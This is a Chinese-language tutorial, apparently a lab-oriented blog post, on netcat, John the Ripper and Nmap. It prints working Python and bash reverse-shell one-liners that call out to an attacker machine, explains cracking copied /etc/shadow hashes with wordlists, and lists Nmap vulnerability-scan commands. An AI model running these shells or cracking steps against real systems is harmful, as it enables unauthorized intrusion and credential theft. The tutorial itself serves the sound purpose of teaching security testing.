nc的全称为NetCat,它能够建立并接受传输控制协议(TCP)和用户数据报协议(UDP)的连接,Netcat可在这些连接上读写数据,直到连接关闭为止。它可以通过手工或者脚本与应用层的网络应用程序或服务进行交互。从技术上来讲,NetCat并不能产生UDP连接,因为UDP是一种无连接的协议。NetCat没有图形界面,很粗糙,很原始。Nc主要功能,Nc可以在两台设备上面相互交互,即侦听模式/传
下载:地址The GNU netcat - Browse /netcat/0.7.1 at SourceForge.net(下载的是netcat-0.7.1.tar.gz版本)
解压到自己指定目录中:
tar -zxvf netcat-0.7.1.tar.gz -C /usr/local安装:
./configure --prefix=/opt/netcat编译:
make安装:
make install配置环境变量:
vim /etc/profile添加以下内容:
# set netcat path
export NETCAT_HOME=/opt/netcat
export PATH=$PATH:$NETCAT_HOME/bin保存,退出,并使配置生效:
source /etc/profilenc的基本命令行形式是
nc [options] host ports其中host是要扫描的主机名或IP地址,ports要么是一个单独的端口,要么是一个端口范围(用m-n的形式指定),要么是一系列用空格隔开的单个端口。
-h 帮助信息
-i secs 延时的间隔
-l 监听模式,用于入站连接
-L 连接关闭后,仍然继续监听
-n 指定数字的IP地址,不能域名服务器
-o file 记录16进制的传输
-p port 本地端口号
-r 随机本地及远程端口
-s addr 本地源地址
-t 使用TELNET交互方式
-u UDP模式
-v 详细输出--用两个-v可得到更详细的内容
-w secs timeout的时间
-z 将输入输出关掉--用于扫描时
1、实现连接通讯
服务端 监听端口 Nc -lnvp 端口
客户端 连接端口 nc ip 端口
代表监听本地的端口输出结果不加域名
2、传输文件内容
服务端:nc -lvp 6666 > 2.txt
客户端:nc ip 端口 < 2.txt
3、获取shell
获取shell分为两种,一种是正向shell,一种是反向shell。如果客户端连接服务器端,想要获取服务器端的shell,那么称为正向shell,如果是客户端连接服务器,服务器端想要获取客户端的shell,那么称为反向shell。
正向shell:
使用Netcat能实现类似ssh的功能,即将目标机器的shell终端暴露在某个端口上,然后本地机器使用Netcat连接到目标机器上,就可以访问目标机器的shell终端
示意图:
攻击机连接靶机,攻击机作为客户端,靶机作为服务器,攻击机主动连接靶机。
缺点:靶机如果有waf或者做了策略基本连不上。
反向shell:
示意图:
靶机连接攻击机,靶机作为客户端主动连接上作为服务端的攻击机。
优点:便于实战使用,不会因为靶机有防火墙而无法连接。
反向shell的渗透思路:命令执行漏洞 ,木马的方式 等。
python方法:
Python:
代码块
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.18.129",7788));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'攻击机开启nc监听端口9999
nc -lvp 9999
靶机利用python代码链接攻击机9999端口并发送自己的shell文件
攻击机:
靶机:
理解:python方法可以在靶机没有nc软件的情况下对攻击机发送shell文件,但需要靶机安装python环境,对靶机有一定要求
bash方法:
代码:
bash -i >& /dev/tcp/192.168.163.128/9999 0>&1靶机:
攻击机:
理解:同理python,不需要环境,软件,linux自带的脚本编译器
John the Ripper是一个快速的密码破解程序,目前可用于Unix,Windows,DOS和OpenVMS的许多口味。其主要目的是检测弱Unix密码。除了在各种Unix系统上最常见的几种crypt(3)密码哈希类型之外,现在支持的还有Windows LM哈希,以及社区增强版本中的大量其他哈希和密码。
Kali中无需下载直接使用 其他Linux请使用命令: 请记得连上互联网!
sudo apt-get install john 或 sudo yum install –y john--single[=SECTION] ] “单裂”模式
--wordlist[=FILE] --stdin 单词表模式,从FILE或stdin读取单词
--pipe 像--stdin一样,但批量读取,并允许规则
--loopback[=FILE] 像 --wordlistg一样, 但是从.pot文件中获取单词
--dupe-suppression 压制wordlist中的所有模糊(并强制预加载)
--prince[=FILE] PRINCE模式,从FILE中读取单词
--encoding=NAME 输入编码(例如,UTF-8,ISO-8859-1)。 也可以 看看doc / ENCODING和--list = hidden-options。
--rules[=SECTION] 为单词表模式启用单词修改规则
--incremental[=MODE] “增量”模式[使用部分模式]
--mask=MASK 掩码模式使用MASK
--markov[=OPTIONS] “马尔可夫”模式(参见doc / MARKOV)
--external=MODE 外部模式或字过滤器
--stdout[=LENGTH] 只是输出候选人密码[在LENGTH切]
--restore[=NAME] 恢复被中断的会话[名为NAME]
--session=NAME 给一个新的会话NAME
--status[=NAME] 打印会话的状态[名称]
--make-charset=FILE 制作一个字符集文件。 它将被覆盖
--show[=LEFT] 显示破解的密码[如果=左,然后uncracked]
--test[=TIME] 运行测试和每个TIME秒的基准
--users=[-]LOGIN|UID[,..] [不]只加载这个(这些)用户
--groups=[-]GID[,..] 只加载这个(这些)组的用户
--shells=[-]SHELL[,..] 用[out]这个(这些)shell来加载用户
--salts=[-]COUNT[:MAX] 用[out] COUNT [到MAX]散列加载盐
--save-memory=LEVEL 启用内存保存,级别1..3
--node=MIN[-MAX]/TOTAL 此节点的数量范围不在总计数中
--fork=N 叉N过程
--pot=NAME 锅文件使用
--list=WHAT 列表功能,请参阅--list = help或doc / OPTIONS
--format=NAME 强制使用NAME类型的散列。 支持的格式可以用-- list=formats和--list=subformats来看(最常用)
破解条件:已知密文
字典模式:(--worldlist)在这种模式下,用户只需要提供字典和密码列表用于破解。
#命令方式:
john --wordlist=wordlst.txt pass_shadow.txt#wordlst.txt:是字典文件,每个密码独占一行
#pass_shadow.txt:密码文件
还可以仅破解指定用户(--user=root)
单一破解模式:(--single)这是john作者推荐的首选模式。John会使用登录名、全名和家庭通讯录作为候选密码。
#命令方式:
john --single pass_shadow.txt递增模式:在该模式下john会尝试所有可能的密码组合。这是最具威力的一种。
外部模式:在这种模式下,用户可以使用john的外部破解模式。使用之前,需要创建一个名为(list.external:mode)的配置文件,其中mode由用户分配。
在使用时,我们首先要将 etc 目录下 passwd 、 shadow 的内容复制到另一个文本文件中,如下命令 。
然后使用john工具进行简单的暴力破解,如下:
当用户的密码设置的十分困难时,我们就需要一个字典文件来进行破解,这时我们可以使用John -w –rules :使用字典文件来进行解密,如人们常用hello、admin、password、superman、cooler、asdfgh、 123456等作为自己的密码。而-rules参数则在此基础上再加上些变化,如字典中有单词test,则john还会尝试使用tes、teSt、 tset等单词变化进行解密。
Nmap是一款开源免费的网络发现和安全审计工具。它被用来快速扫描大型网络.包括主机探测于发现、开放的端口情况、操作系统与应用服务指纹识别及常见安全漏洞。它的图形化界面是Zenamp
主机发现
端口扫描
版本侦测
操作系统侦测
-T4指定扫描过程的级别,级别越高扫描速度越快,但也越容易被防火墙或者IDS 屏蔽, 一般推荐使用T4级别
-sn只进行主机发现,不进行端口扫描
-〇进行系统版本扫描
-sV进行服务版本扫描
-p 扫描指定端口
-sS发送SYN包扫描
-sT发送TCP包扫描
-sA发送ACK包扫描
-sU UDP扫描
-PO 不进行ping扫描
-script指定脚本扫描
open :开放的,表示应用程序正在监听该端口的连接,外部可以访问
filtered:被过滤的.表示端口被防火墙或其他网络设备阻止,不能访问
closed:关闭的,表示目标主机未开启该端口
unfiltered:未被过滤的,表示nmap,无法确定端口所处状态,需进一步探测
open/ filtered:开放的或被过滤的, Nmap 不能识别
closed/ filtered:关闭的或被过滤的, Nmap 不能识别
1、nmap 192.168.1.1扫描单个目标
2、nmap 192.168.1.0/24扫描192.168.1.0这个网段
注意:A类 10.0.0.0/8
B类 172.0.0.0/16
C类 192.168.0.0/24
3、nmap 192.168.1.1 -p 21.22,23,80扫描192.168.1.1这个地址是否开放了某端口
4、 nmap -sS -T4 -sV 192.168.1.1 以sS.方式扫描.级别为T4.结果详细输出,扫描192.168.1.1
5、 nmap -ss-p1-65535 -v 192.168.1.1扫描192.168.1.1目标主机全部端口
6、 nmap --script=vuln 192.168.1.135 采用脚本扫描的方式,扫出对方存在的漏洞